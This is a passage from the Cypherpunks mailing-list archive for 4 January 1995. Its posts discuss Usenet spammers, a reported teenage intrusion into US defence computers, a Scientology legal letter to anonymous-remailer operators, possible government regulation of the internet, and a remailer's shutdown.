other people's communications with their ads, rather than the act of advertising per se -- much like someone standing up during a town meeting on some local matter and starting to declaim loudly not on the purpose of the meeting but instead about how great their legal services were. Peter also did little to interview anyone with substantial standing in the internet community about what C&S were doing -- a quote or two from an old net hand like a Gene Spafford or someone of that ilk might have been valuable. As it was, he didn't produce much to counter the viewpoint that they were the victims rather than the victimizers. I think it is only because the "paper of record" published articles that made them look like their point of view had any merit at all that they managed to survive this long. As it is, the Tennessee Bar is looking in to whether they have committed any new ethical violations. I'd say, of course, that they had... Perry From tavi at info.polymtl.ca Wed Jan 4 06:41:39 1995 From: tavi at info.polymtl.ca (Octavian Ureche) Date: Wed, 4 Jan 95 06:41:39 PST Subject: 16 years old hacker arrested ? Message-ID: <199501041442.AA20561@von-neumann.info.polymtl.ca> > According to AFP(London), The Independent reported on January 3, 1995 > that a sixteen years old boy was arrested for breaking into the > computer network of US Defense Department. > > The report also tells that the hacker posted documents about last > year's nuclear crisis between North Korea and USA. > > Does anyone know where can I get a copy of that documents ? > This is a repost from another list: --------------------------------------------------------- TEEN-AGE HACKER TAPS INTO U.S. DEFENSE SECRETS From wire reports LONDON - A British teen-ager allegedly hacked into sensitive U.S. government computers and was able to monitor secret communications over the North Korean nuclear crisis last spring, the Independent newspaper reported Tuesday. The boy tapped into several defense computers for seven months in what U.S. officials conceded was one of the most serious breaches of computer security in recent years, the paper said. The 16-year-old, after reading the messages, put them on a bulletin board on the Internet, an international computer network accessible to 35 million users. A British hacker who read the messages told the Independent they contained information about firing sites in North Korea and field intelligence. "He kept detailed logs of communication traffic. He really couldn't believe his luck. The Americans thought he was a spy but he told them he was just doing it for fun," the hacker told the Independent. The boy, nicknamed "Datastream" by other Internet users, was finally caught by special U.S. investigators because he left his terminal on-line to a U.S. defense computer overnight. British police arrested the boy in July and prosecutors are expected to decide this month whether he can be charged, the Independent said. In a statement to the paper, the U.S. Air Force Office of Special Investigations acknowledged the hacker could have accessed and read the Korean files. From nsb at nsb.fv.com Wed Jan 4 06:45:31 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 4 Jan 95 06:45:31 PST Subject: San Francisco Editorial In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com> Message-ID: A letter to the editor is like spitting into the wind in this case. I think what's needed is a more constructive affirmative action, ideally taking Cantor and Siegel to court somewhere. I know that there was an FCC ruling in 1993 that has saved me LOADS of annoyance from telephone sales calls, because now if you get such a call and you formally request to be taken off their dialing lists, you can actually SUE them if they call you again. As a result, they now tend to take you very seriously when you make such a request in a knowledgable fashion. Does anyone know if there might be a similar legal case to be made against net spammers who persist after being warned? I suspect that it's easy to make such a case for email spamming, but probably not for spamming of umoderated newsgroups. Note that I speak entirely for myself here, not for my employers. -- Nathaniel From dan at chopin.udel.edu Wed Jan 4 06:59:35 1995 From: dan at chopin.udel.edu (The Dalai Lama) Date: Wed, 4 Jan 95 06:59:35 PST Subject: Anonymous payment scheme In-Reply-To: <9501040637.AA11348@anchor.ho.att.com> Message-ID: I know that in Delaware it is illegal for a merchant to request ID when you pay by credit card. I'm not sure if this is wide spread or just local. -- [Here's something for those friendly mail scanners...] hack phreak crack assassinate president virus espionage clinton honduras root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche > The standard merchant contract with Visa/Mastercharge used to forbid > merchants from asking for additional ID unless they suspected fraud; > I think some states have made laws about this as well. > > Bill > From frissell at panix.com Wed Jan 4 07:14:10 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 4 Jan 95 07:14:10 PST Subject: Regulatory Risks Message-ID: <199501041514.AA02778@panix.com> So if the feds intend to regulate cyberspace, what specific sorts of regulations are possible at this point? Forget laws, what is *technically* and institutionally feasible? Can they just throw out TCP/IP and mandate X25? Can TCP/IP be "tamed?" How can they control private virtual networks that piggyback on the basic network structure? Just questions. No answers. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From nobody at replay.com Wed Jan 4 08:00:03 1995 From: nobody at replay.com (Name withheld on request) Date: Wed, 4 Jan 95 08:00:03 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: <199501041600.AA07488@xs1.xs4all.nl> January 3, 1995 TO: INTERNET REMAILER OPERATORS FROM: THOMAS M. SMALL COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE PUBLICATIONS, INC. I represent Religious Technology Center ("RTC"), which owns the unpublished, confidential Advanced Technology of the religion of Scientology, and holds exclusive rights under the copyrights applicable to the Advanced Technology materials. I also represent Bridge Publications, Inc., which holds the exclusive right to print, publish and sell various non-confidential works by the founder of the Scientology religion, L. Ron Hubbard, and to make and publish compilations and derivative works of and from those works and to enforce all rights in them. It has come to my attention that there are two alternate newsgroups on the Internet to which individuals have been annonymously posting certain of my clients' published and unpublished copyrighted materials, including certain of the confidential Advanced Technology materials. These confidential materials being posted were stolen from my client. There is reason to believe that the materials which are uploaded by these users may also be downloaded by other users, and that these activities may be occurring through the systems which are linked into the Internet. The two newsgroups into which these materials are being copied are alt.technology.clearing and alt.religion. Scientology. We request your assistance in dealing with the problem. The spread of infringements and misappropriations by the users will be lessened if you lock out from your systems the two newsgroups involved, alt.religion.scientology and alt.technology.clearing, limiting the potential for reposting and downloading. It will then be easier to deal with the intentional infringers through appropriate channels. Both the uploading and downloading of these materials constitute unauthorized copying and distribution of the materials in violation of our clients' rights under United States copyright laws and the law of other countries, where applicable. Damages and an injunction against further unauthorized copying and distribution may be obtained against infringers and, all unauthorized copies and all materials and equipment by which the unauthorized copies may be reproduced can be impounded. Unauthorized disclosure of the confidential Advanced Technology materials also violates applicable trade secrets laws. Action is being taken directly with the systems users who we know are primarily responsible for these violations of my clients' rights. We hope those actions will put an end to the infringements by these users. We do {not} wish to involve others in litigation. Unfortunately, however, such actions will be unavoidable where there is contributory infringement by those who knowingly induce or contribute to the infringing conduct of these users by providing facilities or systems that enable the direct infringers to infringe, because we legally must take all actions to protect our clients' property rights. Courts are holding such contributory infringers liable. Two examples are: Sega Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. 1152 (M.D. Fla. 1993). Recent proposed legislation regarding potential liability of systems operators and others who provide facilities or services, such as annonymous remailers, for information passing through their systems has understandably created concern on the part of systems operators as a potential liability. We ask your voluntary assistance in dealing with these known wilful infringers so that we can both deal with the problem without legal hassles, and legal liability can be confined to those who intend to create the situation. We ask that you confirm that you have blocked access to these newsgroups through your remailer. If you are unwilling to do so, we ask that you inform us as to the reasons for your position. Sincerely, Thomas M. Small From bmorris at netcom.com Wed Jan 4 08:52:49 1995 From: bmorris at netcom.com (Bob MorrisG) Date: Wed, 4 Jan 95 08:52:49 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: <199501041652.IAA22982@netcom7.netcom.com> BL> I don't see why a debit card couldn't be anonymous BL> Why should a bank care who you are once they have BL> your money in the account. The bank might not care. The IRS probably does and would insist on knowing about transfers from bank accounts to anon debit cards. BL> you don't lose the card how can someone use your account? Just like with real cash. Possession is ownership. Digital cash involves crypto and, I assume, some type of personal ID? From pcw at access.digex.net Wed Jan 4 09:30:06 1995 From: pcw at access.digex.net (Peter Wayner) Date: Wed, 4 Jan 95 09:30:06 PST Subject: Siegel and Lewis Message-ID: <199501041728.AA27110@access2.digex.net> > >Peter also did little to interview anyone with substantial standing in >the internet community about what C&S were doing -- a quote or two >from an old net hand like a Gene Spafford or someone of that ilk might >have been valuable. As it was, he didn't produce much to counter the >viewpoint that they were the victims rather than the victimizers. Geez, thanks. He quoted me in an article on the C&S problem long ago. I had a legitimate beef because my service provider dutifully kept many empty newsgroups around just in case someone discovered them. C&S did and I literally spent 2 hours unsubscribing from all of them. I seem to remember that he quoted me as being really inconvenienced, which is pretty much what happened to everyone else. > >I think it is only because the "paper of record" published articles >that made them look like their point of view had any merit at all that >they managed to survive this long. As it is, the Tennessee Bar is >looking in to whether they have committed any new ethical >violations. I'd say, of course, that they had... You are correct, though, about this. They seem to draw much more unsuspicious attention then a pair of disbarred attornies should get. Of course, all attornies deserve caution and suspicion. > >Perry From rah at shipwright.com Wed Jan 4 09:50:48 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 4 Jan 95 09:50:48 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: At 5:00 PM 1/4/95, Name withheld on request wrote: This may be interesting. Practically the entire revenue stream for the "Church" of "Scientology" comes from "sales" of this "literature". If someone publishes it on the internet anonymously, the revenue accounts of the Co$ may become "Clear". Ahem. Meanwhile, theology and philosophy departments everywhere are fighting for funding to put most of the legitimate canon in their fields on the net for free... > Thomas M. Small ^^^^^ Cheers, Bob R. Nott ^^^^ ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From frissell at panix.com Wed Jan 4 10:36:29 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 4 Jan 95 10:36:29 PST Subject: British Hacker Article Message-ID: <199501041831.AA22005@panix.com> >From The Independent (London) Tuesday 3 January 1995 - Front Page [Banner Headlines] BRITISH BOY `RAIDED US DEFENCE SECRETS' by Tim Kelsey A 16-year-old Briton allegedly hacked into some of the US government's most sensitive computers and was able to watch secret communications between US agents in north Korea during the crisis over nuclear inspection last spring. After reading them, he put them onto a bulletin board of the Internet, an international computer network accessible by 35 million users. _The_Independent_ has learnt that Scotland Yard has arrested the boy and has sent a report to the Crown Prosecution Service. Officers expect to be told whether he can be charged this month. In what US officials have conceded is one of the most serious breaches of computer security in recent years, the boy accessed several defence department systems for at least seven months without detection. The systems he obtained access to included those for ballistic weapons research, and aircraft design, payroll, procurement, personnel records and electronic mail. The boy, who was arrested in Tottenham, north London in July, was, according to US officials, one of a number of people who broke into US defence computers in the latter months of 1993 and the early months of 1994. But it is understood that he was responsible for most of the damage. In all, more than a million user passwords were compromised. The US Defence Information Systems Agency admitted in a private briefing, which has been confirmed, that the hackers had affected the Department's "military readiness." The boy was first detected in March 1994, and the Air Force Office of Special Investigations (OSI) was appointed to investigate. The OSI is a special task force, based at Bolling Air Force Base in Washington DC. It mounts special "raids" on classified computer sites to test their security. A spokesman said yesterday that the boy, who was nicknamed "Datastream" by friends on the Internet, needed "more knowledge than the average home computer owner would possess" to hack the computers. It is understood that he invented a "sniffer" programme which searched across hundreds of computers attached to the Internet for passwords and user names. He was finally caught because he left his terminal on-line to a US defence computer over night. Another British hacker, aged 22, who is acquainted with "Datastream", read some of the messages accessed by him. "They contained information about firing sites in North Korea and stuff like that. Field intelligence. He kept detailed logs of communication traffic. He really couldn't believe his luck. The Americans thought he was a spy but he told them he was just doing it for fun. The OSI said in a statement: "It is unknown if any hacker actually read, copied or took any other action with the Korean files or any other sensitive data. The Korean files were on the Girths Air Force Base computer system and therefore the could have been accessed. It is our opinion that the hacker who accessed the Korean file system learned of its existence form a bulletin board system or another hacker. It is possible the hacker could have read the Korean files." Scotland Yard's Computer Crime Unit is able to prosecute the boy under the terms of the Computer Misuse Act, which allows for crimes committed overseas by Britons to be dealt with in UK courts. A spokesman confirmed that a report had been sent to the CPS. The Internet, designed in the 1960s by US Defence engineers to enable them to communicate quickly by computer, is now available to anyone who pays a small fee. --- Keyboarding by Lois Roth ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From jamesd at netcom.com Wed Jan 4 10:38:47 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 4 Jan 95 10:38:47 PST Subject: Press attack on anonymity. In-Reply-To: <9501032146.AA19980@argosy.MasPar.COM> Message-ID: On Tue, 3 Jan 1995, David G. Koontz wrote: > The question is who launched all this stuff? When the government -- or some rogue government department wishing to expand its role and authority -- wishes to launch a new, and possibly unpopular, act of coercion, they normally find some interest group that might be advantaged by that act of coercion, and boost them up. Assume the objective is to make the famous information superhighway into an imitation of Plodigy and existing media -- in other words ensure that it is dominated by few to many communications, and that many to many communications are censored. The obvious interest group is those who wish to advertise on the interent as if it was a normal few to many medium. This assumption makes predictions consistent with what we observe. I am not unduly worried. Cantor and Siegal is not a significant interest group. Furthermore the Republican party is at present in favor of many to many communications because talk radio was a big factor in their victory, and the internet was a major factor in the defeat of Foley. This is just a small time conspiracy by some ignorant rogue government department, perhaps the NSA, that does not realize what they are confronting. When the internet starts to have a serious impact on government revenues, then I am going to worry. In addition, many to many communications work primarily against the Democrats primarily because they are so entrenched in power. When the Republican party has been in power a while, they will no longer be so keen on many to many communication. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From unicorn at access.digex.net Wed Jan 4 10:55:56 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 4 Jan 95 10:55:56 PST Subject: Siegel and Lewis In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com> Message-ID: On Wed, 4 Jan 1995, Doug Barnes wrote: > Date: Wed, 4 Jan 1995 07:42:57 -0600 (CST) > From: Doug Barnes > To: Raph Levien > Cc: cypherpunks at toad.com > Subject: Re: Siegel and Lewis > > > Why is it that so many cypherpunks like the economist? > > I learned recently that Eric is a big fan. So am I. You're certainly > not the first other cypherpunk to mention this. Weird. I mean, it's > not exactly a radical publication... it just gets its *&#$*#$ facts > right. Probably this is it. I am also a fan. I tend to focus on the subject matter economist prints. I just find it more on target than most if not all of the major U.S. media sources. > > Doug > > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From jamesd at netcom.com Wed Jan 4 11:06:45 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 4 Jan 95 11:06:45 PST Subject: Regulatory Risks In-Reply-To: <199501041514.AA02778@panix.com> Message-ID: On Wed, 4 Jan 1995, Duncan Frissell wrote: > So if the feds intend to regulate cyberspace, what specific sorts of > regulations are possible at this point? > > Forget laws, what is *technically* and institutionally feasible? Criminalize anonymity, and tell the internet providers to figure out how to enforce it or face confiscation. After that, they can get involved in the standards business to ensure that when the current 32 bit internet address space is upgraded, we go with a system where the technology supports centralized administration rather than anarchy. They can do it -- but they probably will not. Recent political events mean that such actions can only be done on presidential authority. It will be impossible to obtain new law to enforce such measures for at least four years. There will be eventually a big confrontation between governments and liberty in cyberspace -- but I doubt that this is it. This one can be won with a few letters to the editor. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jim at rand.org Wed Jan 4 11:08:49 1995 From: jim at rand.org (Jim Gillogly) Date: Wed, 4 Jan 95 11:08:49 PST Subject: Warning letter from Co$. [any comments ?] In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl> Message-ID: <199501041907.LAA06127@mycroft.rand.org> > nobody at replay.com (Name withheld on request) writes: > FROM: THOMAS M. SMALL > COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE > PUBLICATIONS, INC. While the issue is interesting (using anonymous mailers to violate copyrights or to expose scams, depending on your view of the content), the apparent aim of the Scientologists isn't met by approaching the cypherpunk remailers: the specific anonymous postings have been through penet so far, I think. > Recent proposed legislation regarding potential > liability of systems operators and others who provide > facilities or services, such as annonymous remailers, for > information passing through their systems has understanda> bly > created concern on the part of systems operators as a > potential liability. We ask your voluntary assistance in You missplet "anonymous". Hope this helps. The only "proposed legislation" I know of was proposed by Martha Siegel, the greencard guru from CyberHell. Any others? > We ask that you confirm that you have blocked access to > these newsgroups through your remailer. If you are unwilling > to do so, we ask that you inform us as to the reasons for > your position. Yeah, right. People unclear on the concept of anonymous remailers. Maybe they should be talking to the mail-to-news forwarders instead. Jim Gillogly Highday, 13 Afteryule S.R. 1995, 19:06 From jamesd at netcom.com Wed Jan 4 11:13:46 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 4 Jan 95 11:13:46 PST Subject: Anonymity and talk.politics.chinal Message-ID: Many of the messages in talk.politics.china are anonymous. They use anon.penet.fi Many of these messages are in Chinese, not ASCII. This is an obvious example of legitimate use of anonymity. In addition this example makes an association in peoples minds between suppressing anonymity, and discouraging dissent. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From quester at eskimo.com Wed Jan 4 11:38:33 1995 From: quester at eskimo.com (Charles Bell) Date: Wed, 4 Jan 95 11:38:33 PST Subject: San Francisco Editorial In-Reply-To: Message-ID: "A letter to the editor is like spitting into the wind", you say. Well, yeah...but with enough spit, the wind may change. So everyone should write letters to the editor....and make copies for your congressman while you're at it. This is absolutely the most effective action you can take for 64 cents. From wcs at anchor.ho.att.com Wed Jan 4 11:41:13 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Wed, 4 Jan 95 11:41:13 PST Subject: Regulatory Risks Message-ID: <9501041905.AA17682@anchor.ho.att.com> Duncan asks > So if the feds intend to regulate cyberspace, what specific sorts of > regulations are possible at this point? > Forget laws, what is *technically* and institutionally feasible? > Can they just throw out TCP/IP and mandate X25? Can TCP/IP be "tamed?" > How can they control private virtual networks that piggyback on the basic > network structure? "Our chief weapon was surprise", and of course Fear, Uncertainty, and Doubt. The most effective thing they could do would be to deploy a digital signature system that you _have_ to use to pay your company taxes or file your individual tax returns on-line, and go from there to requiring it for other business transactions with the government. Subsidized servers, of course. It's worked with Social Security Numbers, and if they control on-line signatures for business, then they can control access to the nets for a large fraction of the population. Along with it, require that banks use the signatures for electronic banking, which is a bit easier since banks are heavily regulated and the Federal Reserve would probably be happy to help. Besides, it gives the Post Office something to do in a post-paper world. They obviously can't prevent piggyback networks, but they _can_ make it economically infeasible for medium-large companies to run them. For instance, declaring internet providers to be common carriers, and doing a "digital telephony bill" to require them to use IPng authentication on packets and traceable headers on news and email systems, with the risk of de-licensing and confiscation for non-conformists. It's nice that the largest backbone provider is now NOT the NSFnet, but a commercial provider (though I'd obviously prefer AT&T to Sprint+MCI :-), but they're still the Phone Company, and could be forced to accept regulation. Meanwhile, at the user end, the Enemy could start using confiscation on any computers caught running remailers or encryption - even if they can't stop us Nasty Evil Black-Marketeering K0deZ Dealers, they could make it too risky to do at work or school, which means your own money is on the line if you get caught calculating in the Black Numbers. I doubt they'll be able to ban convicted lawbreakers from using computers entirely for much longer (heck, I wouldn't be able to use my microwave oven any more, much less drive my car), but they could still try. Bill From avi at clas.ufl.edu Wed Jan 4 12:46:33 1995 From: avi at clas.ufl.edu (Avi Harris Baumstein) Date: Wed, 4 Jan 95 12:46:33 PST Subject: Warning letter from Co$. [any comments ?] In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl> Message-ID: <199501042047.PAA06797@cutter.clas.ufl.edu> nobody writes a very nice, non-confrontational and well thought out letter supporting his case (and ignoring the oddness of copyrighting religous materials). but i have some questions that weren't discussed when i took business law 101 a few years ago: nobody at replay.com (Name withheld on request) writes: > applicable. Damages and an injunction against further > unauthorized copying and distribution may be obtained against > infringers and, all unauthorized copies and all materials and > equipment by which the unauthorized copies may be reproduced > can be impounded. Unauthorized disclosure of the > confidential Advanced Technology materials also violates > applicable trade secrets laws. i know there has been much chatter on this subject, but are there truly any precedents that could hold on the anonymous distribution of copyrighted material? are remailer-ops truly in legal danger? what exactly constitutes a trade secret, and what sort of laws apply? > clients' property rights. Courts are holding such > contributory infringers liable. Two examples are: Sega > Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. > Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. > 1152 (M.D. Fla. 1993). what of these cases? is this just an example of typical lawyerly intimidation tactics? how do you remailer-ops plan to react? my first instinct (were i running a remailer) would be to ignore it, on grounds that i wouldn't examine any mail passing through. but if there really were valid precedent in this matter... (has anyone seen any well-written lay-person evaluations of the steve jackson case? i read the ruling, but much of it went in one eye and out the other). i think the censorship thing is building steam, and we should start preparing (and informing) ourselves... -avi From danisch at ira.uka.de Wed Jan 4 13:02:33 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Wed, 4 Jan 95 13:02:33 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: <9501042102.AA22721@elysion.iaks.ira.uka.de> > These confidential materials being posted were stolen from > my client. There is reason to believe that the materials > which are uploaded by these users may also be downloaded by > other users, What makes him think that anyone (except thetans which spend all their money to scientology anyway) wants to have this "material" and wastes any diskspace or bandwith for ? Hadmut From anonymous-remailer at shell.portal.com Wed Jan 4 13:10:13 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 4 Jan 95 13:10:13 PST Subject: who? Message-ID: <199501042110.NAA27459@jobe.shell.portal.com> does anybody know what the email address is for the good samaritans? tia ps, how come mail i send to jpiunix.com is getting bounced, are they down? From nesta at nesta.pr.mcs.net Wed Jan 4 13:22:59 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 4 Jan 95 13:22:59 PST Subject: regards to legal attempt to stifle remailers In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl> Message-ID: After reading the post from teh Scientologists about lockout out groups form anon-remailers, I was thining a little bit, note I said a little bit this isnt a fully fleshed out idea yet. I was thinking it may be smart for osme of the remailers to lock out the groups, in particular those operators who do it forma student acount, or perhaps from their own account in teh United states where legal action would be able to reach them. But to get around this, the anon users can use the Finland server, or a new and imporoved anon-remailer. By shopping around for ISPs it is possible to find a provider who takes payment thru mail and doesnt require positive ID to set up an account. With this you then either run that account as the remailer, a totally anon account not linked to your person and thus immune from legal actions(besies having it closed by the ISP if they are pressured) or you can run a SLIP connection and runa remailer much like Julf's on your own machien thru a dedicated SLIP line. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From jrochkin at cs.oberlin.edu Wed Jan 4 13:45:21 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 4 Jan 95 13:45:21 PST Subject: San Francisco Editorial Message-ID: At 5:44 PM 01/03/95, Hal wrote: >The scary thing about cancels is that some proposals have actually been >directed at anonymous posts themselves. Someone anonymously posted >what purported to be a grisly transcript of the last seconds of the >doomed Challenger crew as they fell to the ocean. This caused a great >hue and cry and some calls for banning anonymous posts and/or >retroactively cancelling them. This led to some very amusing events >which Detweiler has chronicled in his FAQ on anonymity, the net result >of which was that the idea was discredited. But the emergence of >CancelMoose is not an altogether positive event in my view. I too have mixed feelings about CancelMoose. But it must be noted, that while it's possible for CancelMoose to be used for Evil Purposes, it hasn't. This isn't a trivial point. The net collectively (well, it wasn't really collective, but I suggest if this individual anonymous CancelMoose hadn't existed, someone else would have done it) responded to something that it's nearly universally agreed upon is bad; C&S-style spamming. That is an example of an anarchist non-hierchical system _working_, despite the lack of rules. And the widespread cancelling of anonymous posts, or posts from communists or whatever, _hasn't_ happened. And if someone tried it, I bet it wouldn't work for long, something would be done to stop it. An anti-cancelbot that reposts anything cancelled by the Evil Censoring Cancelbots, or something. (Why haven't C&S thought of this themselves? Would really create havok with all the cancels and anti-cancels and re-cancels, etc.) I dont' think Martha Siegel really understands what's going on (not a surprise). She is speaking out against a lawless anarchist net, and saying we need more rules. Because she's mad at people cancelling her posts, mainly. But it seems completely obvious that if we _did_ have rules, they would prohibit the kind of really horrible spams she and her husband have been undertaken. Because 99.99% of the net agrees that those spams are really bad. But, like I said, such rules aren't even neccesary. The net collectively reacts. And there will be a counter reaction, C&S will figure out how to get around the cancelbots, or the cancelbots will be used for Evil, or whatever. But I believe firmly that that would cause yet another counter reaction of some kind. And so on and so on. The net will stay at equilibrium. From erc at s116.slcslip.indirect.com Wed Jan 4 13:45:48 1995 From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin]) Date: Wed, 4 Jan 95 13:45:48 PST Subject: warning letter from... Message-ID: Speaking of Scientology... Forwarded message: > Newsgroups: rec.humor.funny > Subject: Do we face Mount St. Helens twice a day? > From: wb8foz at netcom.com (David Lesher) > Keywords: topical, funny, parody, computers > Approved: funny at clarinet.com > Message-ID: > Date: Wed, 4 Jan 95 12:20:02 EST > > AP: BILL TAKES ON ORAL & JIM > > Bill Gates, Incorporated announced that the Corporation has > purchased a controlling interest in the Church of Scientology, > effective today. The amount of the transaction was not > disclosed. > > A corporate spokesman reading from a prepared text called > "premature" reports that the next version of the company's > mainstay product, referred to as "Windows_2001" in the trade > press, will incorporate an E-meter pop-up box. > > The spokesman did vehemently deny that BGI had really intended > to purchase the Roman Catholic Church, but had drafted the > contract with Microsoft Word on a Pentium, thus causing the > error. > > "We got what we wanted. We see a great potential in the > Church's auditing techniques, and plan to use them to > investigate methods of producing more uniform structured > thoughts, err, code." > > BGI is privately held. > RCC stock closed down 1/8, in light trading. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" From jrochkin at cs.oberlin.edu Wed Jan 4 13:46:49 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 4 Jan 95 13:46:49 PST Subject: Siegel and Lewis Message-ID: At 7:22 PM 01/03/95, Raph Levien wrote: > His piece that ran Saturday was badly mangled by the editorial >process, especially since it ran on page one. Those articles get to be >mangled by a whole new set of people who otherwise wouldn't get to >touch it. I think Lewis has basically good intentions, and does do his >homework before writing a story. Yeah, I encourage everyone to actually _finish_ reading that article before putting Lewis on your permanent hate list. I almost put it down in disgust, from the stuff on page 1, but if you turn to where the article is continued, it becomes quite a bit more balanced and less fear-mongering. In a rather disjointed sort of way, that makes it easy to beleive the article was mangled somewhat in editing. Perhaps they rearanged it to put the "sensational" fear-mongering stuff first. Which is unfortunate, and perhaps intentional, because most people probably won't make it to the end of the article, and if they do, will have been pre-biased by the initial paragraphs, especially if this is the first they've heard of the subject. But I don't have too much trouble believing that all blame belongs on the editors, and not Lewis. :) From wulkwa at near.net Wed Jan 4 13:47:22 1995 From: wulkwa at near.net (wulkwa at near.net) Date: Wed, 4 Jan 95 13:47:22 PST Subject: Regulatory Risks Message-ID: <199501042146.QAA08343@nova.umd.edu> I think it's important to realize that organizations move on a slower time scale than people. The larger the organization, the longer the time scale. Thus, when looking at the government's response to anonymous transactions it would be wise to look at trends dating back to the '70s (if not earlier). Also, it's important to realize that such long-term activities are systemic in nature. Examples of government attacks on anonymous activities might include the war on drugs (especially the money laundering countermeasures). W. From koontz at MasPar.COM Wed Jan 4 13:59:06 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Wed, 4 Jan 95 13:59:06 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: <9501042201.AA29419@argosy.MasPar.COM> Other than the obvious, that elctronic media hasn't been shown to be covered by intellectual property, and that something that has been placed in the public domain, rightly or wrongly isn't confidential ... Is this a hoax? From adwestro at ouray.Denver.Colorado.EDU Wed Jan 4 14:05:43 1995 From: adwestro at ouray.Denver.Colorado.EDU (Alan Westrope) Date: Wed, 4 Jan 95 14:05:43 PST Subject: who? In-Reply-To: <199501042110.NAA27459@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 4 Jan 1995 13:10:45 -0800, anonymous-remailer at shell.portal.com wrote: > ps, how come mail i send to jpiunix.com is getting bounced, are they down? Regrettably, it appears jpunix.com is down permanently. I can't fault John at all, and want to thank him for running a robust remailer for as long as he was able. I captured this earlier today: ============================================================================= From: perry at jpunix.com (John A. Perry) Newsgroups: alt.privacy.anon-server,alt.anonymous Subject: Re: Jpunix "unknown"? Date: 4 Jan 1995 06:55:22 -0600 Organization: J. P. and Associates In article , Don Doumakes wrote: >I've gotten several pieces of mail returned from jpunix. Is it down >permanently, or is this just a temporary problem? Here is the test of a message I sent to remailer-operators: The anonymous remailer at jpunix.com is going to shut down permanently shortly after I send this message. I spent my holidays fighting spams, running out of disk space because of spams and people sending HUGE binaries, and running out of swap space. I have come to the ultimate conclusion that the Internet is not mature or developed enough for remailers. The intended purpose has been completely ignored while abuse is growing almost geometrically on a daily basis. I have concluded that running a remailer on the Internet is like giving a bunch of terrorists a nuclear bomb and then telling them "But only use it for good!". There just doesn't seem to be much point in thrashing my disks and computer to aid somebody in net abuse. I hardly ever (never) see any use of the remailer for the purposes it was intended. BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 30 seconds. The contents of the spam being passed thru my system essentially says: THIS IS A MAIL BOMB!! **** BOOM *** ============================================================================= Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwsa7VRRFMq4NZY5AQEC7QP/SsfagBISP7k+0en0MeJpTPD56BNv0xGX Fh80FuzJ/8Ya7Z4ykz8C1zTtXUaKJeIMgGbQkwybYveOGY5eZWgkc62r+FjmW6fh JY2WhI7e0w+NpfjLBktr+deBvy3b9ElXfbiObfftZMZX/yVke7KX7p7hhdK8t7/g vVj+TqEMhGU= =GnaX -----END PGP SIGNATURE----- From elkinsd at teleport.com Wed Jan 4 14:10:47 1995 From: elkinsd 